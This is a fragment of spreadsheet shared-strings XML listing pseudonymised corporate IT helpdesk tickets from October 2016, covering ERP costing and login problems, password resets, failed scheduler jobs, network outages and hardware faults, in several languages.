    <t xml:space="preserve">costing issue for material 6526474  in plant_316 plant </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: aytjedki.rucfxpla@gmail.com_x000D_
_x000D_
hi can some help me with a costing issue?_x000D_
_x000D_
mm6526474 this is a part that is made at plant_327 and was extended to plant_316. as you can see the cost at plant_316 is at 21.83 and 12.39 usd. i think that the 21.83 is incorrect._x000D_
when i try to cost this part it is coming in at the 21.83 on the ppc1 and 12.38 on the gpc1 with an warning message of mat. 6526474 in plant plant_316: itemization does not match cost component split_x000D_
i am not sure as to what i need to do to correct this. can you help?_x000D_
_x000D_
plant_327 cost is at 16.12 cad_x000D_
_x000D_
_x000D_
[cid:image004.png@01d2284d.2ff23140]_x000D_
_x000D_
_x000D_
_x000D_
[cid:image002.png@01d2284c.febc1410]_x000D_
_x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>aytjedki rucfxpla</t>
  </si>
  <si>
    <t>erp SID_34 locked.</t>
  </si>
  <si>
    <t>hfpkmiwn wcxrfani</t>
  </si>
  <si>
    <t>dedalus report on pdf blocked.</t>
  </si>
  <si>
    <t xml:space="preserve">
summary:cannot open downloaded dedalus report on pdf. this was reported on several collegues when downloading and opening this particular report.</t>
  </si>
  <si>
    <t>push-out reports</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ctzykflo.evzbhgru@gmail.com_x000D_
_x000D_
dear all,_x000D_
_x000D_
i just got the information that since last wednesday rkyjnbqh kfshormi â€“ a sales engineer â€“ didn't receive any push-out reports like_x000D_
the open quote report etc._x000D_
_x000D_
can someone please check and let us know what happens._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ctzykflo evzbhgru</t>
  </si>
  <si>
    <t>urgent : local server down HostName_1326</t>
  </si>
  <si>
    <t>error : windows cannot access \\HostName_1326"
red cross on the drives in the server.
user has access to server. it has worked before.
contact : 
it has impacted our quoting team, design team, and manufacturing (usa plant)</t>
  </si>
  <si>
    <t>ewsybazi otkuaxhw</t>
  </si>
  <si>
    <t>unable to open business_client // install .net framdntyework 4.5</t>
  </si>
  <si>
    <t>ewotmgpx xkalcwsz</t>
  </si>
  <si>
    <t>network drive not loading</t>
  </si>
  <si>
    <t>weekly sales activity reports</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: mnlvhtug.imvetgoa@gmail.com
i didn't receive any sales activity order reports from publications@company.com for this past weekâ€¦
mnlvhtug imvetgoa
sr. application engineer
general engineering
company inc.
mnlvhtug.imvetgoa@gmail.com&lt;mailto:mnlvhtug.imvetgoa@gmail.com&gt;
[cid:image001.png@01d15842.000812f0]
</t>
  </si>
  <si>
    <t>mnlvhtug imvetgoa</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: btvmxdfc.yfahetsc@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
i'm facing some problems to join conference calls by skype._x000D_
when i access i'm the only one in the call._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>rechner fÃ¼r EU_tool stÃ¤be hÃ¤ngt sich auf .\spdczoth vajtodny</t>
  </si>
  <si>
    <t>spdczoth vajtodny</t>
  </si>
  <si>
    <t>reset passwords for ldmwqubi sovqeynk using password_management_tool password reset.</t>
  </si>
  <si>
    <t>forgot password for erp login</t>
  </si>
  <si>
    <t>ldmwqubi sovqeynk</t>
  </si>
  <si>
    <t xml:space="preserve">not able to open single sign on portal on hub </t>
  </si>
  <si>
    <t>zqyikobt ufxamgwr</t>
  </si>
  <si>
    <t>rechner fÃ¼r infostand defekt \probleme mit lÃ¼fter \niptbwdq csenjruz</t>
  </si>
  <si>
    <t>wir brauchen usb-stick (16gb) fÃ¼r 1.lehrjahr (4 stÃ¼ck).</t>
  </si>
  <si>
    <t xml:space="preserve">hallo ,
wir brauchen usb-stick (16gb) fÃ¼r 1.lehrjahr (4 stÃ¼ck).
</t>
  </si>
  <si>
    <t>dknejifu dljvtebc</t>
  </si>
  <si>
    <t>not able to submit lean tracker in collaboration_platform</t>
  </si>
  <si>
    <t>eudkoiny zfwtoiun</t>
  </si>
  <si>
    <t>outlook- skype  problem</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: cspkeyza.bzpyfcki@gmail.com_x000D_
_x000D_
hello team ,_x000D_
_x000D_
i can not open outlook and skype in my pc, it gives an error like this_x000D_
_x000D_
_x000D_
[cid:b711608e-db1e-449e-bb73-e6c73c32c540]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>cspkeyza bzpyfcki</t>
  </si>
  <si>
    <t>unable to get to password_management_tool to change the password</t>
  </si>
  <si>
    <t>lxmpfiez katjygbp</t>
  </si>
  <si>
    <t>vpn is suddenly not accepting credentials.</t>
  </si>
  <si>
    <t>ubqiygva zdkfxyel</t>
  </si>
  <si>
    <t>in pm_tool_for_sd i can not upload projects to erp .</t>
  </si>
  <si>
    <t>please see the attached jpg file that show the message from pm_tool_for_sd.</t>
  </si>
  <si>
    <t>jghqolyd cydthpjv</t>
  </si>
  <si>
    <t>ewvibrfg atlurzdn</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3028 failed in job_scheduler at: 10/17/2016 06:46:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3028 failed in job_scheduler at: 10/17/2016 06:46:00</t>
  </si>
  <si>
    <t>bobj webi publications services are not running.</t>
  </si>
  <si>
    <t>all the bobj webi publications have failed over the weekend. the services are still not working.</t>
  </si>
  <si>
    <t>froajhdb ijetmkuc</t>
  </si>
  <si>
    <t>pending pr status &amp; workflow details of approver</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ilbkhgxd.hirsqytd@gmail.com
help desk
there are 2 pr which are pending more than 10 &amp; 15 days which are yet to release by i1. please find the screen shot for both the pr's as below.
[cid:image007.png@01d22886.3e109ad0][cid:image008.png@01d22886.3e109ad0]
[cid:image009.png@01d22886.3e109ad0][cid:image010.png@01d22886.3e109ad0]
but when it is checked in work flow of approver's (user id : jagtgarthy), nothing is pending. screen shot is attached for the same.
[cid:image001.jpg@01d22886.3e3b7b60]
please verify the details for not appearing in the work flow of approver's.
</t>
  </si>
  <si>
    <t>ilbkhgxd hirsqytd</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1142 failed in job_scheduler at: 10/17/2016 06:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1142 failed in job_scheduler at: 10/17/2016 06:06:00</t>
  </si>
  <si>
    <t>re: ticket_no1558511 -- comments added</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: stdiondwd.rawdwu@company.com
hello dwight,
any update on this?
</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1013 stibo server physical drive and power supply issue. </t>
  </si>
  <si>
    <t>not able to open drtawings in pdf</t>
  </si>
  <si>
    <t>uxpytsdk kyamilds</t>
  </si>
  <si>
    <t>bobj - not working</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ctzykflo.evzbhgru@gmail.com_x000D_
_x000D_
dear all,_x000D_
_x000D_
all reports under bob information spaces like the product management report and quota report and others are missing._x000D_
_x000D_
you simply get an empty screen. other users report the same problem._x000D_
_x000D_
can you please fix the issue._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>volume: c:\ label:sys-amssm003 94ef9088 on server: is over 85% consumed</t>
  </si>
  <si>
    <t xml:space="preserve">volume: c:\ label:sys-amssm003 94ef9088 on server: is over _x000D_
85% space consumed. space available: 2.1 g </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3181 failed in job_scheduler at: 10/17/2016 05:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3181 failed in job_scheduler at: 10/17/2016 05:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">loaner laptop germany location required </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ubiqcrvy.mxjcnqfs@gmail.com
hi it-team,
i would please need two loaner laptops ( location: germany) from november 21th-22th november 2016 for visitors/consultant from bank who`s name are rtbkimey cfsqwtdv and xikojdym rgazclmi. the consultant will finish a huge update for our erp payment management and autobank tool.
cost center: fuf02756
</t>
  </si>
  <si>
    <t>ubiqcrvy mxjcnqfs</t>
  </si>
  <si>
    <t>not able to see sny information spaces n bobj prod server</t>
  </si>
  <si>
    <t>xagyhbio jvrdnpkh</t>
  </si>
  <si>
    <t>reset the password for mdvlkbac uhefoqtg on erp / production / erp</t>
  </si>
  <si>
    <t xml:space="preserve">please unlock the account ( hanx123 ) and reset password for me , </t>
  </si>
  <si>
    <t>mdvlkbac uhefoqtg</t>
  </si>
  <si>
    <t>set up hand phone for email</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ynsqjehx.kqgrsawl@gmail.com_x000D_
_x000D_
hi it team,_x000D_
_x000D_
i'd like to set up my hand set samsung i9305 for my company outlook emails._x000D_
pls offer assistance._x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>im not able to login to SID_32 system.plese look into this on priority.my user id : venktyamk12</t>
  </si>
  <si>
    <t>im not able to login to SID_32 system.plese look into this on priority.my user id is venktyamk12</t>
  </si>
  <si>
    <t>fe10 å¤å°å‡ºæ¥çº¸å¼ æ–‡å­—ä¸æ¸…æ™°</t>
  </si>
  <si>
    <t>omatlyrd bvraipdt</t>
  </si>
  <si>
    <t>probleme mit benutzer erneut nur temporÃ¤r! \merdivan \xwirzvda okhyipgr</t>
  </si>
  <si>
    <t>anmeldefehler lync \qidgvtwa qvbutayx</t>
  </si>
  <si>
    <t>dvi schnittstelle ohne funktion.</t>
  </si>
  <si>
    <t xml:space="preserve">dvi schnittstelle ohne funktion. vermutlich grafikkarte defekt. </t>
  </si>
  <si>
    <t>iqwymodv gbarydmw</t>
  </si>
  <si>
    <t>fehlermeldung:  systemfehler &amp;h91115116 (). unbekannter fehler</t>
  </si>
  <si>
    <t>cieagtub vwyzjlqm</t>
  </si>
  <si>
    <t>my engineering tool is not taking new password. it is showing number of failed attempts exceeded.</t>
  </si>
  <si>
    <t>name:syhunil krishnyhda
language:
browser:microsoft internet explorer
email:mpvasqwy.rotkyeja@gmail.com
customer number:
telephone:
summary:i changed my password from password_management_tool password. unlocked all accounts. my engineering tool is not taking new password. it is showing number of failed attempts exceeded.</t>
  </si>
  <si>
    <t>mpvasqwy rotkyeja</t>
  </si>
  <si>
    <t>bob j</t>
  </si>
  <si>
    <t xml:space="preserve">hello,_x000D_
_x000D_
bob-j geht wieder mal nicht._x000D_
haben wir einen systemfehler?_x000D_
_x000D_
bob j goes back not even._x000D_
do we have a system failure?_x000D_
 _x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen_x000D_
best </t>
  </si>
  <si>
    <t>gmneclxj czqthmrs</t>
  </si>
  <si>
    <t>unable to create delivery-35934304/item 70</t>
  </si>
  <si>
    <t xml:space="preserve">please provide the following:_x000D_
_x000D_
what order number?   35934304_x000D_
_x000D_
what material or item number?  3114712_x000D_
_x000D_
what warehouse location? plant_283_x000D_
_x000D_
issue description / error message?  cannot run d/n although plant_283 has 1 pcs stock  </t>
  </si>
  <si>
    <t>hrqvkemg dmcxbrqj</t>
  </si>
  <si>
    <t>æ›´æ›å¯†ç¢¼å¾Œ, company connectå¯ç™»å…¥,ä½†ç„¡æ³•ä½¿ç”¨</t>
  </si>
  <si>
    <t>zhpwcdea cboefuis</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1332 failed in job_scheduler at: 10/17/2016 02:26:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1332 failed in job_scheduler at: 10/17/2016 02:26:00</t>
  </si>
  <si>
    <t>item on sales order not pulling through to picking slip</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: htnvbwxs.gwfrzuex@gmail.com_x000D_
_x000D_
good day._x000D_
_x000D_
please help with the following:_x000D_
_x000D_
we have an issue on the below sales order:_x000D_
_x000D_
[cid:image001.png@01d2284d.f0e9c250]_x000D_
_x000D_
the first line item is not pulling through to the picking slip:_x000D_
_x000D_
[cid:image002.png@01d2284d.f0e9c250]_x000D_
_x000D_
please assist._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>htnvbwxs gwfrzuex</t>
  </si>
  <si>
    <t xml:space="preserve">r126 pc def. evtl. netzgerÃ¤t </t>
  </si>
  <si>
    <t>fasirxzo xlvnhptm</t>
  </si>
  <si>
    <t xml:space="preserve">keine datenÃ¼bertragung erp datenbank zu tintenstrahldrucker imaje  </t>
  </si>
  <si>
    <t>bitte sofort lokalen it support smpijawb eawkpgqf vor ort schicken um fehler zu analysieren
komplette auslieferung des werkes germany steht!!!!!!!</t>
  </si>
  <si>
    <t>EU_tool performance is very low again</t>
  </si>
  <si>
    <t>as in the last weeks, the EU_tool performance is verly low in germany (plant_197).</t>
  </si>
  <si>
    <t>pmweoxyq zrkjnydi</t>
  </si>
  <si>
    <t>not able to submit lean tracker</t>
  </si>
  <si>
    <t>EU_tool und chargenverwaltung geht nicht.</t>
  </si>
  <si>
    <t>ctixyzku jitrahgx</t>
  </si>
  <si>
    <t xml:space="preserve">file scanning problem in richoscan-wy14  </t>
  </si>
  <si>
    <t xml:space="preserve">from: yotyhga narthdyhy 
sent: monday, october 17, 2016 10:51 am
to: nwfodmhc exurcwkm
subject:  - fw: file scanning problem in richoscan-wy14 
kindly request you to it,
previous this folder is in m drive directly mtb-1st floor-richoscan-wy14  and now somebody have moved this to mtb-1st floor-richoscan-wy15.  please correct this and now not able to scan the files to mtb-1st floor-richoscan-wy14.
</t>
  </si>
  <si>
    <t>vwhkldyp efblthqc</t>
  </si>
  <si>
    <t>EU_tool ausfall in germany</t>
  </si>
  <si>
    <t>keine rÃ¼ckmeldungen und zuteillisten mÃ¶glich</t>
  </si>
  <si>
    <t>vumbyikw kqsiougd</t>
  </si>
  <si>
    <t>serverprobleme qm-soft nicht anwendbar</t>
  </si>
  <si>
    <t>battery not charging when the power adapter is connected.</t>
  </si>
  <si>
    <t xml:space="preserve">battery not charging when the power adapoter is connected.
-when the power adaptor is unpliugged , the batter is not detected.
system: latitude e5440
service tag: hvzlqthr12 | express service code: 38567939551238 
-installed the power system bios .
-restarted the pc and checked still the same issue.
-issue with the battery.needs replacement.
-contact : </t>
  </si>
  <si>
    <t>computer will not turn on.</t>
  </si>
  <si>
    <t xml:space="preserve">the computer 5lthyqzns1 service code 1276199035169 will not turn on at all.  tried changing elengineering toolical plug and had no effect.  the fan to the computer will not turn on either.
contact: gordon leach/xernsfqa uzvsnlbd number </t>
  </si>
  <si>
    <t>xbhqcayd smkbuphw</t>
  </si>
  <si>
    <t>reset passwords for cubdsrml znewqgop using password_management_tool password reset.</t>
  </si>
  <si>
    <t>cubdsrml znewqgop</t>
  </si>
  <si>
    <t>printer offline (see attachment)</t>
  </si>
  <si>
    <t>ryaudfxm shjdaolm</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u6 failed in job_scheduler at: 10/17/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u6 failed in job_scheduler at: 10/17/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u1 failed in job_scheduler at: 10/17/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u1 failed in job_scheduler at: 10/17/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u2 failed in job_scheduler at: 10/17/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u2 failed in job_scheduler at: 10/17/2016 00:02:00</t>
  </si>
  <si>
    <t>login issue erp SID_34</t>
  </si>
  <si>
    <t>login issue erp SID_34_x000D_
-user getting "logon balancing error - 88._x000D_
-advised the user to check if he is on the company network._x000D_
-advised the user to login and check._x000D_
-caller confirmed that she was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>fqhlvcxn zdfymgjp</t>
  </si>
  <si>
    <t>dn 9169508476,t/o 642392</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: gjtyswkb.dpvaymxr@gmail.com_x000D_
_x000D_
dear it,_x000D_
_x000D_
we can not do z_chk for dn 9169508476,pls help to check it, it's urgent, </t>
  </si>
  <si>
    <t xml:space="preserve">cannot review stock at mdw04 // mm 6720004 </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: aqrhwjgo.cyelqkvs@gmail.com_x000D_
_x000D_
dear it team,_x000D_
_x000D_
i just complete gr for dn 9168073012_mm 6720004 but there is not stock available on md04. please advise because i would like to ship to customer 5 pcs today._x000D_
_x000D_
[cid:image001.png@01d22863.386174b0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>access to network drive and printer</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: sxnzacoj.lwvqgfby@gmail.com
please provide access to following to mr. akirtyethsyd (user id: vvsthryomaa)
1.       \\aswyuysm003\mtbelengineering toolical_production&lt;file:///\\aswyuysm003\mtbelengineering toolical_production&gt; (read write)
2.       \\HostName_95\mtbu_ele&lt;file:///\\HostName_95\mtbu_ele&gt; (read only)
3.       printer wy14
</t>
  </si>
  <si>
    <t>sxnzacoj lwvqgfby</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u2 failed in job_scheduler at: 10/16/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u2 failed in job_scheduler at: 10/16/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u6 failed in job_scheduler at: 10/16/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u6 failed in job_scheduler at: 10/16/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u1 failed in job_scheduler at: 10/16/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u1 failed in job_scheduler at: 10/16/2016 23:00:00</t>
  </si>
  <si>
    <t>è½¬å‘: recall plant_247-101516-02  ref 6500073942</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wktesmbp.lorjymef@gmail.com
dear team,
we got a stock recall notice from plant_247 plant,mm#2982278*200pcs need to be returned to plant_101. we just created sto#5019340040 for this request but only 80pc dn generated. pls. help to run out dn for the rest 120pc materials,thx!
b.rgds
judthtihty.zhuyhts
company hardpoint apac-wgq dc
</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3050 failed in job_scheduler at: 10/16/2016 22:18:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3050 failed in job_scheduler at: 10/16/2016 22:18:00</t>
  </si>
  <si>
    <t>ned on to vpn, but can not access hana or erp.</t>
  </si>
  <si>
    <t>name:pfzxecbo ptygkvzl
language:
browser:microsoft internet explorer
email:pfzxecbo.ptygkvzl@gmail.com
customer number:
telephone:
summary:signed on to vpn, but can not access hana or erp.</t>
  </si>
  <si>
    <t>outlook not launching.</t>
  </si>
  <si>
    <t xml:space="preserve">outlook not launching.
-contact : 
-connected to the user system using teamviewer
-user confirmed he does not use ms crm.
-tried to repair the ms office.
-restarted the pc.
-tried to reconfigure the outlook. taking some time.
-outlook ver - 2016
-user mentioned that he will call us back tomorrow with the ticket nunber
-please help the user.
</t>
  </si>
  <si>
    <t>dslamtcb ezbmonjr</t>
  </si>
  <si>
    <t>erp been locked, please help to un-lock, and tell me the new password.</t>
  </si>
  <si>
    <t>please help to unlock erp, and tell me the new password</t>
  </si>
  <si>
    <t>cjdkhuxz bwmldgor</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2114 failed in job_scheduler at: 10/16/2016 17:31:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2114 failed in job_scheduler at: 10/16/2016 17:31:00</t>
  </si>
  <si>
    <t>bobj</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: vxzahrlc.frtkpehy@gmail.com_x000D_
_x000D_
it,_x000D_
please image below. i have been trying to get into bobj all day and this is all that shows up._x000D_
_x000D_
[cid:image001.jpg@01d227c5.8a6dadd0]_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vxzahrlc frtkpehy</t>
  </si>
  <si>
    <t xml:space="preserve">ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
jqxtbspr mpfdivlh
 hello rakthyesh
rakthyesh 
 hi davidthd
 </t>
  </si>
  <si>
    <t>jqxtbspr mpfdivlh</t>
  </si>
  <si>
    <t>need to change password and sync new password on all accounts</t>
  </si>
  <si>
    <t>unable to sign in to skype</t>
  </si>
  <si>
    <t>password reset for ess user nothrdaj12</t>
  </si>
  <si>
    <t>kihwsrdu ucnjwtxo</t>
  </si>
  <si>
    <t>circuit outage:company-na-usa-usa-plant-bld1-qa-carb-2960-01-access-sw01 switch is down since 7:14 am et on 10/16.</t>
  </si>
  <si>
    <t>circuit outage:company-na -usa-usa-plant-bld1-qa-carb-2960-01-access-sw01 switch is down since 7:14 am et on 10/16.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3343 failed in job_scheduler at: 10/16/2016 04:55:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3343 failed in job_scheduler at: 10/16/2016 04:55:00</t>
  </si>
  <si>
    <t>application "plm conversion server" on node "HostName_521" is in a warning state in monitoring_tool</t>
  </si>
  <si>
    <t xml:space="preserve">warning:  alwaysupservice.exe process count </t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1140 failed in job_scheduler at: 10/16/2016 02:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1140 failed in job_scheduler at: 10/16/2016 02:30:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3343 failed in job_scheduler at: 10/16/2016 01:01:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3343 failed in job_scheduler at: 10/16/2016 01:01:00</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/16/2016 00:31:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 10/16/2016 00:31:00</t>
  </si>
  <si>
    <t xml:space="preserve">job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 10/16/2016 00:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job mm_zscr0099_wkly_rollfgyuej1 failed in job_scheduler at: 10/16/2016 00:20:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_480 failed in job_scheduler at: 10/16/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_480 failed in job_scheduler at: 10/16/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_6_regen failed in job_scheduler at: 10/16/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_6_regen failed in job_scheduler at: 10/16/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1653 failed in job_scheduler at: 10/16/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1653 failed in job_scheduler at: 10/16/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job snp_heu_5_regen failed in job_scheduler at: 10/16/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job snp_heu_5_regen failed in job_scheduler at: 10/16/2016 00:02:00</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap2 failed in job_scheduler at: 10/15/2016 23:49:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap2 failed in job_scheduler at: 10/15/2016 23:49:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3050 failed in job_scheduler at: 10/15/2016 23:38:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3050 failed in job_scheduler at: 10/15/2016 23:38:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3050 failed in job_scheduler at: 10/15/2016 23:37:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3050 failed in job_scheduler at: 10/15/2016 23:37:00</t>
  </si>
  <si>
    <t>circuit outage:india :company-ap-ind-carrier-891-dmvpn-rtr02 is down since 10.15 pm et on 10/15. primary circuit is up.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     xcircuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    __no_______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ___10.15 pm et on 10/15___________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ____no___    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? no_______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</si>
  <si>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planned power outage :matlxjgi elrndiuy - (company) hard down since 10:03 pm on 10/15 et</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____yes____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _______10:03 pm on 10/15 et_______________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ____na___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_____no___     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ______na_____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____yes____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_737 failed in job_scheduler at: 10/15/2016 21:11:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
backup statistics:_x000D_
          _x000D_
  session queuing time (hours)         0.00        _x000D_
  -------------------------------------------      _x000D_
  completed disk agents ........         32          _x000D_
  failed disk agents ...........          0          _x000D_
  aborted disk agents ..........          0          _x000D_
  -------------------------------------------      _x000D_
  disk agents total  ...........         32          _x000D_
  ===========================================      _x000D_
  completed media agents .......          1          _x000D_
  failed media agents ..........          1          _x000D_
  aborted media agents .........          0          _x000D_
  -------------------------------------------      _x000D_
  media agents total  ..........          2          _x000D_
  ===========================================      _x000D_
  mbytes total .................  277264 mb        _x000D_
  used media total .............          1          _x000D_
  disk agent errors total ......          0    _x000D_
_x000D_
_x000D_
_x000D_
job Job_737 failed in job_scheduler at: 10/15/2016 21:11:00</t>
  </si>
  <si>
    <t>sound not working , suspecting email threat</t>
  </si>
  <si>
    <t xml:space="preserve">from: thaybd mhasttdd 
sent: saturday, october 15, 2016 10:52 pm
to: nwfodmhc exurcwkm
cc: rohthsit mhdyhtya
subject: fw: inquiry - purchase order
hi,
kindly check for below mail, is hope it may be junk mail. i never meet any person as name shows of sender. i have tried opening attachment but unable to do that.
forwarding this mail for seeking it help to check whether its only junk mail or attachment opeyctrhbkm plvnuxmry cause issues ( like virus or our company database theft through link)
please check and confirm.
best </t>
  </si>
  <si>
    <t>esaqztby mhnbqiyc</t>
  </si>
  <si>
    <t xml:space="preserve">inquiry on erp SID_34 maintenance  </t>
  </si>
  <si>
    <t>rzckwufx vgysnlab</t>
  </si>
  <si>
    <t xml:space="preserve">apac, company: multiple switches went down at 07:36 pm et on 10/15. </t>
  </si>
  <si>
    <t>company-ap-chn-apac-company-fpsf-2960s-access-sw01_x000D_
company-ap-chn-apac-company-pmw-2960s-access-sw01_x000D_
company-ap-chn-apac-company-psf-2960s-access-sw01</t>
  </si>
  <si>
    <t xml:space="preserve">job bcv117_SID_37 failed in job_scheduler at: 10/15/2016 18:03:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bcv117_SID_37 failed in job_scheduler at: 10/15/2016 18:03:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_38hoti failed in job_scheduler at: 10/15/2016 17:27:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_38hoti failed in job_scheduler at: 10/15/2016 17:27:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_55hoti failed in job_scheduler at: 10/15/2016 17:25:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_55hoti failed in job_scheduler at: 10/15/2016 17:25:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_563 failed in job_scheduler at: 10/15/2016 15:12:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_563 failed in job_scheduler at: 10/15/2016 15:12:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_480 failed in job_scheduler at: 10/15/2016 13:18:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_480 failed in job_scheduler at: 10/15/2016 13:18:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bwhrattr failed in job_scheduler at: 10/15/2016 08:45:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
